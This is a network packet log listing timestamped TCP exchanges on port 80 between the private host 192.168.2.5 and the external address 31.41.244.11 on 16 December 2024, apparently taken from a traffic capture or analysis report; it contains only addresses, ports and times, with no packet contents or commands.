Dec 16, 2024 11:03:10.285665035 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.390882969 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.391036034 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.391139984 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.391139984 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.392177105 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.392234087 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.392276049 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.392328024 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.394149065 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.394198895 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.394258976 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.394306898 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.396287918 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.396361113 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.396419048 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.398399115 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.398488998 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.398547888 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.400471926 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.400593996 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.400613070 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.400649071 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.402529001 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.402599096 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.402600050 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.402645111 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.404553890 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.404676914 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.404751062 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.406513929 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.406651020 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.406725883 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.408510923 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.408586979 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.408622980 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.408679008 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.410490036 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.410556078 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.410737991 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.410790920 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.412369013 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.412429094 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.412523985 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.413788080 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.414299965 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.414360046 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.414453030 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.414499044 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.416207075 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.416271925 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.416294098 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.416342974 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.418181896 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.418242931 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.418293953 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.418359041 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.420072079 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.420212984 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.420275927 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.422049046 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.422172070 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.422261953 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.423894882 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.424041033 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.424109936 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.425837040 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.425909996 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.425942898 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.426055908 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.427767038 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.427833080 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.427874088 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.427922010 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.429649115 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.429713964 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.429791927 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.429848909 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.431607008 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.431663990 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.431725979 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.431797028 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.433533907 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.433629990 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.433690071 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.433756113 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.435431004 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.435497999 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.435555935 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.435663939 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.437324047 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.437377930 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.437405109 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.437434912 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.439279079 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.439371109 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.439448118 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.439512014 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.441184998 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.441251040 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.441320896 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.441375017 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.443106890 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.443172932 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.443228960 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.443305969 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.445019007 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.445084095 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.445209026 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.445264101 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.446921110 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.446989059 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.447052956 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.447108984 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.448858023 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.448920012 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.448967934 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.449037075 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.450772047 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.450826883 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.450898886 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.450953007 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.452699900 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.452763081 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.452848911 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.452913046 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.454700947 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.454766035 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.454854012 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.454909086 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.456515074 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.456569910 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.456640959 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.456695080 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.458434105 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.458494902 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.458580017 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.458635092 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.460378885 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.460443020 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.460530996 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.460589886 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.462265968 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.462325096 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.462358952 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.462416887 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.464196920 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.464247942 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.464251041 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.464309931 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.466134071 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.466264963 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.466314077 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.466315031 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.468036890 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.468092918 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.468158960 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.468216896 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.469997883 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.470057011 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.470129967 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.470190048 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.472007036 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.472059965 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.472059965 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.472105026 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.473789930 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.473917007 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.473956108 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.474095106 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.475699902 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.475766897 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.475821018 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.475878000 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.477622032 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.477693081 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.477761984 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.477824926 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.479667902 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.479724884 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.479928017 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.479985952 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.481455088 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.481507063 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.481519938 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.481554031 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.483375072 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.483439922 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.483489990 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.483556032 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.485302925 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.485364914 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.485426903 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.485481977 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.487210989 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.487267017 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.487360954 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.487422943 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.489147902 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.489201069 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.489206076 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.489253044 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.583265066 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.583379984 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.583381891 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.583596945 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.584028959 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.584103107 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.584105015 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.584155083 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.585617065 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.585675001 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.585676908 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.585741997 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.587268114 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.587332964 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.587376118 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.587433100 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.588849068 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.588907957 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.588970900 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.589032888 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.590470076 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.590539932 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.590579987 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.590636969 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.592010021 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.592065096 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.592091084 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.592125893 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.593601942 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.593657970 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.593676090 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.593708992 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.595417976 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.595484018 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.595568895 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.595626116 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.596652985 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.596710920 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.596780062 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.596838951 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.598172903 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.598233938 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.598258972 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.598315001 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.599642992 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.599713087 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.599761963 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.599817038 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.601133108 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.601197958 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.601233959 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.601291895 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.602618933 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.602690935 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.602726936 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.602792025 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.604054928 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.604120016 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.604195118 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.604258060 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.605477095 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.605535984 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.605611086 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.605665922 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.607064009 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.607124090 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.607134104 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.607194901 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.608361959 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.608426094 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.608489990 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.608552933 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.609787941 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.609846115 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.609935045 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.609992027 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.611162901 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.611222029 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.611259937 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.611339092 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.612525940 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.612582922 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.612643003 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.612699032 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.613909006 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.613975048 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.614032030 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.614099026 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.615262985 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.615344048 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.615396023 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.615453959 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.616636992 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.616693020 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.616770983 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.616833925 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.618015051 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.618074894 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.618124008 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.618185997 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.619434118 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.619498968 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.619657993 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.619719982 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.620752096 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.620815039 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.620882034 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.620938063 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.622104883 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.622160912 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.622212887 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.622304916 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.623511076 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.623570919 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.623694897 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.623752117 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.624905109 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.625017881 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.625078917 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.626257896 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.626508951 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.626574993 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.627630949 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.627696991 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.627723932 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.627779961 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.628992081 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.629049063 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.629115105 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.629170895 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.630347967 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.630414963 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.630450010 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.630503893 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.631716967 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.631783009 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.631839991 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.631896019 CET	49783	80	192.168.2.5	31.41.244.11
